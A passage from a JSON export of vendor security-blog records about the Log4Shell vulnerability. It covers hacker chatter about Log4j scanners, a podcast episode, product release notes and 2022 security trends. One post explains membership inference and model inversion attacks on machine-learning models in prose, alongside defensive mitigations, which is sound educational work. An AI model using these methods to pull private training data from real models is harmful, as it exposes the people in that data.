Various scanners were published on GitHub to identify vulnerable systems.\n\nScanners are the cybercriminal's tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company \u2014 regardless of size \u2014 can be a target.\n\nLog4j Scanner Discussion on RedditA fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts\n\n## While others look inside, we look outside\n\nThe bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.\n\n_[Read more](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) about the Log4Shell vulnerability within Log4j, and what your team can do in response._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T21:05:17", "type": "rapid7blog", "title": "Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T21:05:17", "id": "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "href": "https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T23:31:00", "description": "![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/security_nation_logo.jpg)\n\nIn our first episode of Security Nation Season 5, Jen and Tod chat with Mike Hanley, Chief Security Officer at GitHub, all about the major vulnerability in Apache\u2019s Log4j logging library (aka Log4Shell). Mike talks about the ins and outs of GitHub\u2019s response to this blockbuster vulnerability and what could have helped the industry deal with an issue of this massive scope more effectively (hint: he drops the SBOM). They also touch on GitHub's updated policy on the sharing of exploits.\n\nStick around for our Rapid Rundown, where Tod and Jen talk about Microsoft\u2019s release of emergency fixes for Windows Server and VPN over Martin Luther King Day weekend.\n\n## Mike Hanley\n\n![\\[Security Nation\\] Mike Hanley of GitHub on the Log4j Vulnerability](https://blog.rapid7.com/content/images/2022/01/image1.jpg)\n\nMike Hanley is the Chief Security Officer at GitHub. Prior to GitHub, Mike was the Vice President of Security at Duo Security, where he built and led the security research, development, and operations functions. After Duo\u2019s acquisition by Cisco for $2.35 billion in 2018, Mike led the transformation of Cisco\u2019s cloud security framework and later served as CISO for the company. Mike also spent several years at CERT/CC as a Senior Member of the Technical Staff and security researcher focused on applied R&D programs for the US Department of Defense and the Intelligence Community.\n\nWhen he\u2019s not talking about security at GitHub, Mike can be found enjoying Ann Arbor, MI with his wife and seven kids.\n\n## Show notes\n\n**Interview links**\n\n * Read [GitHub\u2019s blog](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/>) on the Log4j vulnerability, and [the follow-up](<https://github.blog/2021-12-14-using-githubs-security-features-identify-log4j-exposure-codebase/>).\n * Check out GitHub\u2019s [Dependabot](<https://github.com/dependabot>).\n * Find out [Why Johnny Can\u2019t Encrypt](<https://www.usenix.org/conference/8th-usenix-security-symposium/why-johnny-cant-encrypt-usability-evaluation-pgp-50>).\n * Learn about [GitHub\u2019s Sponsor Program](<https://github.com/sponsors>).\n * Read about the work going on at [OpenSSF](<https://openssf.org/>).\n * Delve into Mike\u2019s [blog post on GitHub\u2019s exploit code policy](<https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/>).\n\n**Rapid Rundown links**\n\n * Get the info on [Microsoft\u2019s emergency fixes](<https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-emergency-fixes-for-windows-server-vpn-bugs/>) for Windows Server and VPN bugs.\n\nLike the show? Want to keep Jen and Tod in the podcasting business? Feel free to rate and review with your favorite podcast purveyor, like [**Apple Podcasts**](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T21:47:30", "type": "rapid7blog", "title": "[Security Nation] Mike Hanley of GitHub on the Log4j Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T21:47:30", "id": "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "href": "https://blog.rapid7.com/2022/01/19/security-nation-mike-hanley-of-github-on-the-log4j-vulnerability/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-06T21:04:20", "description": "\n\n****More context and customization around detections and investigations, expanded dashboard capabilities, and more.****\n\nThis post offers a closer look at some of the recent releases in [InsightIDR](<https://www.rapid7.com/products/insightidr/>), our [extended detection and response (XDR)](<https://www.rapid7.com/blog/post/2021/11/09/insightidr-was-xdr-before-xdr-was-even-a-thing-an-origin-story/>) solution, from Q4 2021. Over the past quarter, we delivered updates to help you make more informed decisions, accelerate your time to respond, and customize your detections and investigations. Here's a rundown of the highlights.\n\n## More customization options for your detection rules\n\nInsightIDR provides a highly curated detections library, vetted by the security and operations center (SOC) experts on our [managed detection and response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team \u2014 but we know some teams may want the ability to fine tune these even further. In our [Q3 wrap-up](<https://www.rapid7.com/blog/post/2021/10/05/whats-new-in-insightidr-q3-2021-in-review/>), we highlighted our new [detection rules](<https://docs.rapid7.com/insightidr/detection-rules/>) management experience. This quarter, we've made even more strides in leveling up our capabilities around detections to help you make more informed decisions and accelerate your time to respond.\n\n_Attacker Behavior Analytics Detection Rules viewed and sorted by rule priority_\n\n * **New detection rules management interface:** With this new interface, you can see a priority field for each detection provided by InsightIDR with new actions available. \n * Change priority of detections and exceptions that are set to Creates Investigation as the Rule Action.\n * View and sort on priority from the main detection management screen.\n * More details on our detection rules experience can be found in our help docs, [here](<https://docs.rapid7.com/insightidr/detection-rules>).\n * ****Customizable priorities for UBA detection rules and custom alerts: ****Customers can now associate a [rule priority](<https://docs.rapid7.com/insightidr/modify-uba-detection-rules#change-rule-priority>) (Critical, High, Medium, or Low) for all of their UBA and custom alert detection rules. The priority is subsequently applied to investigations created by a detection rule.\n * ****A simplified way to create exceptions:**** We added a new section to detection rule details within \"create exception\" to better inform on which data to write [exceptions](<https://docs.rapid7.com/insightidr/modify-detection-rules#add-exceptions>) against. This will show up to the 5 most recent matches associated with that said detection rule \u2014 so now, when you go to write exceptions, you have all the information you may need all within one window.\n\n## MITRE ATT&CK Matrix for detection rules\n\nThis new view maps detection rules to MITRE tactics and techniques commonly used by attackers. The view lets you see where you have coverage with Rapid7's out-of-the-box detection rules for common attacker use cases and dig into each rule to understand the nature of that detection.\n\n_MITRE ATT&CK Matrix within Detection Rules_\n\n## Investigation Management reimagined\n\nAt Rapid7, we know how limited a security analyst's time is, so we reconfigured our [Investigation Management](<https://docs.rapid7.com/insightidr/investigations/>) experience to help our users improve the speed and quality of their decision-making when it comes to investigations. Here's what you can expect:\n\n * A revamped user interface with expandable cards displaying investigation information\n * The ability to view, set, and update the priority, status, or disposition of an investigation\n * Filtering by the following fields: date range, assignee, status, priority level\n_New investigations interface_\n\nWe also introduced MITRE-driven insights in Investigations. Now, you can click into the new MITRE ATT&CK tab of the Evidence panel in Investigation to see descriptions of each tactic, technique, and sub-technique curated by MITRE and link out to [attack.mitre.org](<https://attack.mitre.org/>) for more information.\n\n_MITRE ATT&CK tab within Investigations Evidence panel_\n\n## Rapid7's ongoing emergent threat response to Log4Shell\n\nLike the rest of the security community, we have been internally responding to the critical remote code execution vulnerability in Apache's Log4j Java library (a.k.a. Log4Shell).\n\nThrough continuous collaboration and ongoing threat landscape monitoring, our Incident Response, Threat Intelligence and Detection Engineering, and MDR teams are working together to provide product coverage for the latest techniques being used by malicious actors. You can see updates on our InsightIDR and MDR detection coverage [here](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/#insightidrandmanageddetectionandresponse>) and in-product.\n\nStay up to date with the latest on Log4Shell:\n\n * View [Log4Shell AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=home>) for our analysis\n * Check out [The Everyperson's Guide to Log4Shell](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)\n * Head to our [Log4Shell Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) for up-to-date information for customers\n\n## A continually expanding library of pre-built dashboards\n\nInsightIDR's [Dashboard Library](<https://docs.rapid7.com/insightidr/dashboards-and-reports/>) has a growing repository of pre-built dashboards to save you time and eliminate the need for you to build them from scratch. In Q4, we released 15 new pre-built dashboards covering:\n\n * Compliance (PCI, HIPAA, ISO)\n * General Security (Firewall, Asset Authentication)\n * Security Tools (Okta, Palo Alto, Crowdstrike)\n * Enhanced Network Traffic Analysis\n * Cloud Security\n_Dashboard Library in InsightIDR_\n\n## Additional dashboard and reporting updates\n\n * ****Updates to dashboard filtering:**** Dashboard Filtering gives users the ability to further query LEQL statements and the data across all the cards in their dashboard. Customers can now populate the dashboard filter with Saved Queries from Log Search, as well as save a filter to a dashboard, eliminating the need to rebuild it every session.\n * ****Chart captions:**** We've added the ability for users to write plain text captions on charts to provide extra context about a visualization.\n * ****Multi-group-by queries and drill-in functionality:**** We've enabled Multi-group-by queries (already being used in Log search) so that customers can leverage these in their dashboards and create cards with layered data that they can drill in and out of.\n\n## Updates to Log Search and Event Sources\n\nWe recently introduced Rapid7 Resource Names (RRN), which are unique identifiers added to users, assets, and accounts in log search. An RRN serves as a unique identifier for platform resources at Rapid7. This unique identifier will stay consistent with the resource regardless of any number of names/labels associated with the resource.\n\nIn log search, an \u201cR7_context\" object has been added for log sets that have an attributed user, asset, account, or local accounts. Within the \u201cR7_context\" object, you will see any applicable RRNs appended. You can utilize the RRN as a search in log search or in the global search (which will link to users and accounts or assets and endpoints pages) to assist with more reliable searches for investigation processes.\n\n_New \u201cr7_context\" Rapid7 Resource Name (RRN) data in Log Search_\n\n****Event source updates****\n\n * ****Log Line Attribution for Palo Alto Firewall & VPN, Proofpoint TAP, Fortinet Fortigate****: When setting up an event source you now have an option to leverage information directly present in source log lines, rather than relying solely on InsightIDR's traditional attribution engine.\n * ****Cylance Protect Cloud event source****: You can [configure CylancePROTECT cloud](<https://docs.rapid7.com/insightidr/cylanceprotect-cloud/>) to send detection events to InsightIDR to generate virus infection and third-party alerts.\n * ****InsightIDR Event Source listings available in the ****[****Rapid7 Extensions Hub****](<https://extensions.rapid7.com/extension/?product=IDR>): Easily access all InsightIDR event source related content in a centralized location.\n\n## Updates to Network Traffic Analysis capabilities\n\n****Insight Network Sensor optimized for 10Gbs+ deployments****: We have introduced a range of performance upgrades that make high-speed traffic analysis more accessible using off-the-shelf hardware, so you're able to gain east-west and north-south traffic visibility within physical, virtual and cloud based networks. If you want to take full advantage of these updates check out the updated sensor requirements [here](<https://docs.rapid7.com/sensor/network-sensor-host-system-requirements/>).\n\n****InsightIDR Asset Page Updates****: We have introduced additional data elements and visuals to the Assets page. This delivers greater context for investigations and enables faster troubleshooting, as assets and user information is in one location. All customers have access to:\n\n * Top IDS events triggered by asset\n * Top DNS queries\n\nFor customers with Insight Network Sensors and ENTA, these additional elements are available:\n\n * Top Applications\n * Countries by Asset Location\n * Top Destination IP Addresses\n\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://help.rapid7.com/insightidr/release-notes/>) as we continue to highlight the latest in detection and response at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T20:41:17", "type": "rapid7blog", "title": "What's New in InsightIDR: Q4 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-06T20:41:17", "id": "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "href": "https://blog.rapid7.com/2022/01/06/whats-new-in-insightidr-q4-2021-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-14T15:27:09", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nSanta\u2019s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around [2.2 billion children in the world](<https://www.humanium.org/en/children-world/>). That\u2019s a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they\u2019ll be getting the gifts they\u2019ve asked for or a lump of coal.\n\n\n\nSanta\u2019s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data \u2014 it\u2019s locked up tight. Santa has, however, made his model\u2019s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.\n\nSanta, being a just and equitable person, has already asked his data elves to tackle issues of [algorithmic bias](<https://en.wikipedia.org/wiki/Algorithmic_bias>). Unfortunately, these data elves have overlooked some issues in machine learning security. Specifically, the issues of membership inference and model inversion.\n\n## Membership inference attacks\n\nMembership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, \u201cWas this example in your training data?\u201d Using the techniques of [Salem et al.](<https://arxiv.org/abs/1806.01246>) or a tool like [PrivacyRaven](<https://github.com/trailofbits/PrivacyRaven>), an attacker can train a model that figures out whether or not a model has seen an example before.\n\n\n\nFrom a technical perspective, we know that there is some amount of memorization in models, and so when they make their predictions, they are more likely to be confident on items that they have seen before \u2014 in some ways, \u201cmemorizing\u201d examples that have already been seen. We can then create a dataset for our \u201cshadow\u201d model \u2014 a model that approximates Santa\u2019s nice/naughty system, trained on data that we\u2019ve collected and labeled ourselves.\n\nWe can then take the training data and label the outputs of this model with a \u201cTrue\u201d value \u2014 it was in the training dataset. Then, we can run some additional data through the model for inference and collect the outputs and label it with a \u201cFalse\u201d value \u2014 it was not in the training dataset. It doesn\u2019t matter if these in-training and out-of-training data points are nice or naughty \u2014 just that we know if they were in the \u201cshadow\u201d training dataset or not. Using this \u201cshadow\u201d dataset, we train a simple model to answer the yes or no question: \u201cWas this in the training data?\u201d Then, we can turn our naughty algorithm against Santa\u2019s model \u2014 \u201cDear Santa, was this in your training dataset?\u201d This lets us take real inputs to Santa\u2019s model and find out if the model was trained on that data \u2014 effectively letting us de-anonymize the historical nice and naughty lists!\n\n## Model inversion\n\nNow being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That\u2019s where model inversion comes in! [Fredrikson_ et al_.](<https://www.cs.cmu.edu/~mfredrik/papers/fjr2015ccs.pdf>) proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of [Carlini et al_._](<https://www.usenix.org/system/files/sec21-carlini-extracting.pdf>), who have managed to extract data from large language models like GPT-2.\n\n\n\nIn model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training set-like outputs. In time, this will provide us with memorized training data.\n\nNote that model inversion is a much heavier lift than membership inference and can\u2019t be done against all models all the time \u2014 but for models like Santa\u2019s, where the training data is so sensitive, it\u2019s worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa\u2019s list remains an open question.\n\n## Mitigating model mayhem\n\nNow, if you\u2019re on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model \u2014 or a very good approximation \u2014 needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely \u201cnaughty\u201d or \u201cnice\u201d instead of returning the probabilities can make both attacks more difficult.\n\nFor extremely sensitive applications, the use of differential privacy or optimizing with [DPSGD](<https://arxiv.org/abs/1607.00133>) can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.\n\nSanta making his list into a model will save him a whole lot of time, but if he\u2019s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. As a best practice, Santa should:\n\n * Log information about queries like: \n * IP address\n * Input value\n * Output value\n * Time\n * Consider differentially private model training\n * Limit API access\n * Limit the information returned from the model to label-only\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n****************More Hacky Holidays blogs****************\n\n * [The 2021 Naughty and Nice Lists: Cybersecurity Edition](<https://www.rapid7.com/blog/post/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/>)\n * [2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball](<https://www.rapid7.com/blog/post/2022/01/06/2022-cybersecurity-predictions-the-experts-clear-off-the-crystal-ball/>)\n * [Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](<https://www.rapid7.com/blog/post/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/>)\n * [Metasploit 2021 Annual Wrap-Up](<https://www.rapid7.com/blog/post/2022/01/05/metasploit-2021-annual-wrapup/>)\n * [5 Security Projects That Are Giving Back](<https://www.rapid7.com/blog/post/2022/01/04/5-security-projects-that-are-giving-back/>)\n * [Sharing the Gifts of Cybersecurity \u2013 Or, a Lesson From My First Year Without Santa](<https://www.rapid7.com/blog/post/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/>)\n * [Hacky Holidays: Celebrating the Best of Security Nation [Video]](<https://www.rapid7.com/blog/post/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/>)\n * [Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T14:46:41", "type": "rapid7blog", "title": "Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa\u2019s List", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T14:46:41", "id": "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "href": "https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-04T12:38:01", "description": "One of the core principles of cybersecurity is not letting things \u201cslip through the cracks\u201d. An effective security posture depends on visibility. The more visibility you have into the environments where your data is, the more successful you will be in applying your organization\u2019s security protocols and identifying suspicious behavior.\n\nHere are five cybersecurity issues that may have \u201cslipped through the cracks\u201d which should be visible to you in 2022.\n\n## [5\\. Exploiting third-party applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>)\n\nMany people have characterized 2021 as "the year of the [software supply chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>)". Chances are if you were not following the issue closely, you are now in light of the new [CVE-2021-44228 vulnerability](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>).\n\n[Zero-day attacks](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), or unpatched security bugs, in commonly used third-party applications, are an example of the risks we assume from our software supply chain. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database. Compounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Even the best Web Application Firewalls require time to adapt with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each specific environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nFor more on how to manage software supply chain attacks, get [**5 Key Ways Supply Chain Attacks Occur**](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>).\n\n## [4\\. Increases in the volume of records stolen](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>)\n\nThe constant increase in the volume of stolen records is the result of multiple factors. We are living in a digitalization era in which more services are consumed daily, with the majority of them online so the amount of data out there increases every year. More businesses have made a very quick shift into digitalization, which if not done carefully, increases security risk. Information security adoption is slower than the adoption of digital services that make a profit from the addiction to and consumption of the same online services. Such a fast, dramatic change is likely to have security implications. Higher volume, less secure data is now stolen in ever-larger chunks. Organizations need to rethink to protect the growing body of critical business data.\n\nLearn more about this in [**Lessons Learned from Analyzing 100 Data Breaches**](<https://www.imperva.com/resources/resource-library/white-papers/lessons-learned-from-analyzing-100-data-breaches/>).\n\n## [3\\. More effective Web Application Firewall Gateway technology](<https://www.imperva.com/blog/impervas-waf-gateway-14-4-protects-enterprises-for-the-post-covid-era/>)\n\nA [recent report](<https://www.verizon.com/business/resources/reports/dbir/>) revealed 39% of all data breaches in 2020 stemmed from web application compromise, a trend that became more pronounced in 2021. Organizations need to get more effective protection from their Web Application Firewalls (WAFs). Here are some of the things your WAF needs to do to take on today\u2019s web application threat vectors:\n\n[More than 24 percent of internet traffic is bad bots](<https://www.imperva.com/resources/resource-library/reports/2020-Bad-Bot-Report/>), so your WAF should offer [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that enables true defense-in-depth security in a single stack model.\n\nYour WAF should provide optimized security and performance benefits for your digital protocols from HTTP2 to TLS 1.3. For activities such as dropping more dynamic content from video snip-bits to 3D visuals, your WAF should facilitate your ability to supersize the customer experience from website to smartphone to support your organization\u2019s omnichannel strategies.\n\nLearn more about next-level WAF Gateway [here](<https://www.imperva.com/resources/resource-library/datasheets/imperva-waf-gateway/>).\n\n## [2\\. New bad bot mitigation strategies](<https://www.imperva.com/blog/bad-bots-continue-to-evolve-your-mitigation-strategy-should-too/>)\n\nBad actors are capitalizing on the opportunities that digital transformation creates, particularly through more sophisticated automated bad bot attacks. But tools to thwart these attacks have become more advanced, too. What should you look for in a solution?\n\nA truly \u201cfuture-proof\u201d bad bot solution will be equipped to handle the most sophisticated bad bots. It must incorporate machine learning that is capable of identifying real-time bad bot behavior and adapting. It also helps establish a baseline for normal behavior, as well as enable automated detection and response. Your solution should be able to block bots from the very first request they make and protect all your access points: websites, mobile apps, and APIs.\n\nLook for device fingerprinting, allowing the solution to track bot activity across IP addresses and detect browser automation tools. Such tools are capable of processing JavaScript and emulating legitimate browsers, making them more difficult to identify and block. The solution should contain cutting-edge techniques, such as injection of active challenges and honeypots into HTTP traffic, per-URL customization and security controls to fine-tune protection; graduated controls for rate-limiting, such as by client, device, authentication token, or simple IP address; and enable community-sourced threat intelligence to help customers learn from one another.\n\nLearn more in [**Imperva\u2019s Ten Essential Capabilities of a Bot Management Solution**](<https://www.imperva.com/resources/resource-library/white-papers/buyers-guide-ten-essential-capabilities-of-a-bot-management-solution/>).\n\n## [1\\. The economic impact of a data security platform](<https://www.imperva.com/blog/infographic-what-is-the-economic-impact-of-a-data-security-platform/>)\n\nVirtually all cybersecurity professionals understand the need to create a data security platform to mitigate threats to sensitive data, but very few people know how to present the acquisition, development, and deployment of a data security platform as a business driver with a demonstrable ROI.\n\nEstablishing a starting point for the evolution of your data security platform can make all the difference. Articulating the challenges that your organization faces is the first step. Mapping these challenges to quantifiable benefits is the next. Having a framework from which to start saves time because your team can modify data points to align with your organization\u2019s requirements. For example, regional salary assumptions and the number of systems to be protected. It also will likely open your eyes to scenarios that you may not have thought of, in the actual language from current consumers of data security technology that have already benefited from the transition.\n\nWhile it can be hard to show the economic impact of change, it\u2019s not impossible. Oftentimes it is easier to modify existing work (red pen) than start from scratch (black pen). [Download the infographic](<https://www.imperva.com/resources/resource-library/infographics/the-total-economic-impact-of-the-imperva-data-protection-solution/>), _The Total Economic Impact of the Imperva Data Protection Solution_ to see the key challenges that organizations faced prior to implementing a data security platform and the resulting benefits after deployment.\n\nThe post [2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022](<https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 